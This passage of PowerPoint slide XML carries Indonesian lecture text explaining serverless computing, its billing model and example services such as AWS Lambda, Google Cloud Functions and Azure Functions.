              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Amazon Web Services (AWS), Microsoft Azure, dan Google Cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memudahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas-tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digerakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> serverless, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di-host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penawaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual private cloud (VPC) "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada instance VM di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penagihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> per jam.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AWS Lambda (aws.amazon.com/lambda), Google Cloud Functions (cloud.google.com/functions), dan Microsoft Azure Functions (azure.microsoft.com/services/functions).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> instance server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file. Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penekanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasarinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
